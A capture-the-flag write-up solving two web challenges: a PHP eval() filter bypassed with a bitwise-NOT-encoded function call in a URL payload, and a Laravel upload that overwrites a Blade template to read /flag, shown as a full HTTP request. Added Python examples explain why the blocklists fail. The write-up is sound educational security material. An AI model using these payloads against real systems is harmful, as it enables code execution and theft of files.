Guangdong Qiangwang Cup: Two Web Writeups


Challenges that @level5 posted in the group; I solved two of them.

web4 php

http://119.61.19.212:8082/index.php

<?php
error_reporting(E_ALL^E_NOTICE^E_WARNING);
// Prints the flag; the goal is to reach this call through eval().
function GetYourFlag(){
    echo file_get_contents("./flag.php");
}

if(isset($_GET['code'])){
    $code = $_GET['code'];
    //print(strlen($code));
    // strlen() counts bytes, so multibyte characters cost several units of the 27.
    if(strlen($code)>27){ 
        die("Too Long.");
    }

    // Blocklist: any letter, digit, underscore, &, ^, <, >, double or single quote kills the request.
    if(preg_match('/[a-zA-Z0-9_&^<>"\']+/',$_GET['code'])) {
        die("Not Allowed.");
    }
    @eval($_GET['code']);
}else{
      highlight_file(__FILE__);
}
?>

The filter blocks letters, digits, underscores and a few other characters, and the code must be at most 27 bytes long; all we need is to call GetYourFlag(). Bitwise NOT (~) gets around the character filter.

echo urlencode(~('GetYourFlag'));

which gives

%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98

The function name then has to be inverted back:

~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)

and stored in a variable. Because of the filter, we use a Chinese character as the variable name; here I used

echo urlencode('中');	//%E4%B8%AD

The variable then holds the inverted-back GetYourFlag function name, and finally the function is called through the variable:

$%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();

Final payload:

view-source:http://119.61.19.212:8082/index.php?code=$%E4%B8%AD=~(%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98);$%E4%B8%AD();
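To see why the blocklist in index.php does not hold, here is an added Python example (not code from the writeup or the challenge) that reproduces the challenge's length and regex check byte-for-byte, rebuilds the page's payload with the same ~ inversion, and counts how many of the 256 byte values the regex never rejects. The hardened_filter_accepts() variant is an assumption of mine showing that even closing the non-ASCII gap leaves a blocklist in front of eval(); the real mitigation is not passing user input to eval() at all.

```python
import re
from urllib.parse import quote

# Added example (not from the original writeup): reproduces the challenge's
# blocklist + length check from index.php. The payload is the one on the page.
MAX_LEN = 27
# The challenge regex, applied to raw bytes the way PHP's preg_match sees them.
BLOCKLIST = re.compile(rb'[a-zA-Z0-9_&^<>"\']+')


def challenge_filter_accepts(code: bytes) -> bool:
    """True if index.php would hand `code` to eval(): short enough, no blocklisted byte."""
    return len(code) <= MAX_LEN and BLOCKLIST.search(code) is None


def bitwise_not(s: bytes) -> bytes:
    """PHP's ~ on a string: every byte is inverted (0x47 'G' becomes 0xB8, and so on)."""
    return bytes((~b) & 0xFF for b in s)


def url_encode(s: bytes) -> str:
    """Same output as PHP urlencode() for the bytes used here (upper-case %XX)."""
    return quote(s, safe="")


def build_page_payload() -> bytes:
    """$中=~(<inverted GetYourFlag>);$中();  -- the writeup's payload, exactly 27 bytes."""
    var = "中".encode("utf-8")  # 3 bytes, none of them in the blocklist
    return b"$" + var + b"=~(" + bitwise_not(b"GetYourFlag") + b");$" + var + b"();"


def bytes_never_rejected() -> int:
    """How many of the 256 byte values slip past the blocklist: all 128 high bytes
    plus the ASCII punctuation it does not cover ($ ~ ( ) ; = and others)."""
    return sum(1 for b in range(256) if BLOCKLIST.search(bytes([b])) is None)


def hardened_filter_accepts(code: bytes) -> bool:
    """Assumed variant: additionally rejects every non-ASCII byte, which blocks the
    page's payload. It is still a blocklist around eval(); do not rely on it."""
    return challenge_filter_accepts(code) and all(b < 0x80 for b in code)


if __name__ == "__main__":
    payload = build_page_payload()
    print(len(payload), challenge_filter_accepts(payload), hardened_filter_accepts(payload))
    print(url_encode(bitwise_not(b"GetYourFlag")), bytes_never_rejected())
```

The count returned by bytes_never_rejected() is the point for a reviewer: the regex rejects 69 byte values and lets 187 through, so the filter enumerates what it fears instead of what it permits, and ~ turns any rejected letter into an accepted high byte.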

web5

A Laravel code audit.

Routes:

[screenshot 20190912093854]

Injection in app/Http/Controllers/UserController.php:

[screenshot 20190912093943]

[screenshot 20190912094106]

The password could not be recovered, but the factory in database/factories/UserFactory.php gives it:

[screenshot 20190912095222]

Next, app/Http/Controllers/HomeController.php:

[screenshot 20190912094237]

After logging in you have to fetch the key from the database before you can upload a file, i.e. reach [email protected]. The uploaded file's name goes through a single filecheck() filter and the file is then moved into the view template directory. That makes it clear: overwrite the original template via the upload, then use template injection to read the flag.

[screenshot 20190912094545]

Conveniently, /resources/views/auth/uploads/ holds a template.blade.php template, and the routes include a controller that renders it.

[screenshot 20190912094749]

[screenshot 20190912094834]

After building a form and uploading, it turned out that filecheck() filters a lot: the file must not contain "php" or "<".

First, Laravel's Blade templates can embed custom PHP code, but only in the following form:

@php
    //
@endphp

But the php keyword is filtered, so the only option was to dig through the Blade documentation, where I found custom directives: https://laravel.com/docs/5.8/blade#extending-blade

[screenshot 20190912095812]

Brilliant: @filedata('/flag') does the job.

POST /home/uploadss/NotAllow6171 HTTP/1.1
Host: 119.61.19.212:8085
Content-Length: 444
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvJNe9ABsnjeKGhDN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IitoWjhwMm1ycmNTWFozSmZTTXJwXC9nPT0iLCJ2YWx1ZSI6IkllczhnNEZodldZbllTN0NmZDErR2I1eXF1bU9mV1wvYklManNuUnQ4YzhJcmlWQ09JVXJPXC9JNHZxVU0xRmdCY0RDbWJHelVwYjQyVjdXQ1FHVlFMMlE9PSIsIm1hYyI6IjNmMGUzZTEwYTA2ZDA2MjJjMDg4OTY5NTI4NDJjNTk2YmQ4N2U4NWYxY2E2ZjU3YWEwNTAwODllMzIyYTU4ZjAifQ%3D%3D; laravel_session=eyJpdiI6InRhRzZmenBJSmFLNHhrb0RlUE5OdVE9PSIsInZhbHVlIjoiZ01qK2JpQURoRHgxbFVrcGc4TE9PK2kycGxSTjlNRzkwK21uVDUxa3UyTW5JYXpIcWJaY2pYbXQwNDc0dklkemNjRmR0aFhZcllmTkRvQXpVUlR3d3c9PSIsIm1hYyI6IjAwMjVkODA3YmY5NDU1Y2U5MDMyMWMwMTI1MTcyMmQ1YTU5NWQzMTE0MGMxMzc0ZWM1NDU4YzQ5MWIyZjI5YTgifQ%3D%3D
Connection: close

------WebKitFormBoundaryvJNe9ABsnjeKGhDN
Content-Disposition: form-data; name="_token"

Z7VZ7FXfNzuzETtQrZ7DeAZCFtbkQl9L8e7ptVin
------WebKitFormBoundaryvJNe9ABsnjeKGhDN
Content-Disposition: form-data; name="files"; filename="template.blade.php"
Content-Type: text/html

@filedata('/flag')
------WebKitFormBoundaryvJNe9ABsnjeKGhDN

Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryvJNe9ABsnjeKGhDN--
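The root cause in web5 is not the weak filecheck() blocklist but where the upload lands: a file written into resources/views is compiled by Blade, so any directive, built in or custom, runs. As an added Python example (not the challenge's code, and not Laravel's), here is what an upload handler would need to check instead. The directory paths, the extension allowlist and the vet_upload() name are my assumptions mirroring the challenge layout; the directive pattern shows why a content blocklist of "php" and "<" never sees @filedata('/flag').

```python
import re
from pathlib import PurePosixPath

# Added example (not from the challenge): assumed paths mirroring the challenge layout.
VIEWS_DIR = PurePosixPath("/var/www/app/resources/views")
UPLOAD_DIR = PurePosixPath("/var/www/app/storage/app/uploads")
ALLOWED_EXT = {".txt", ".png", ".jpg", ".pdf"}

# Blade directives look like @name(...) or bare @php / @endphp. A blocklist of the
# substrings "php" and "<" (what filecheck() does on the page) misses @filedata('/flag').
BLADE_DIRECTIVE = re.compile(rb"@(?:php|endphp)\b|@[A-Za-z_]\w*\s*\(")


def is_within(path: PurePosixPath, root: PurePosixPath) -> bool:
    """True if `path` is `root` itself or lies underneath it."""
    return path == root or root in path.parents


def looks_like_blade(data: bytes) -> bool:
    """Heuristic content check for Blade directives; secondary to the path check below."""
    return BLADE_DIRECTIVE.search(data) is not None


def vet_upload(upload_dir, filename: str, data: bytes):
    """Returns (accepted, reason_or_destination) for one uploaded file."""
    upload_dir = PurePosixPath(upload_dir)
    name = PurePosixPath(filename).name  # drop any client-supplied directory part
    if name in ("", ".", "..") or name.startswith("."):
        return False, "bad file name"
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    # Allowlist exactly one extension; 'template.blade.php' has two and fails here.
    if len(suffixes) != 1 or suffixes[0] not in ALLOWED_EXT:
        return False, f"extension not allowed: {''.join(suffixes) or '(none)'}"
    dest = upload_dir / name
    # Never write uploads anywhere the template engine will compile them.
    if is_within(dest, VIEWS_DIR):
        return False, "destination is inside the Blade views directory"
    if looks_like_blade(data):
        return False, "content contains a Blade directive"
    return True, str(dest)


if __name__ == "__main__":
    print(vet_upload(UPLOAD_DIR, "template.blade.php", b"@filedata('/flag')"))
    print(vet_upload(VIEWS_DIR / "auth" / "uploads", "notes.txt", b"plain text"))
    print(vet_upload(UPLOAD_DIR, "notes.txt", b"plain text"))
```

The order of the checks is deliberate: the file name and extension are validated first, the destination is then tested against the views directory regardless of what the name looks like, and the content heuristic comes last because it can only ever catch patterns someone thought of. The challenge configuration fails the second check on its own, which is why no amount of tuning filecheck() would have fixed it.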

My writing is poor, the wording flippant, the content shallow and the technique clumsy. Corrections and pointers from more experienced players are very welcome; many thanks.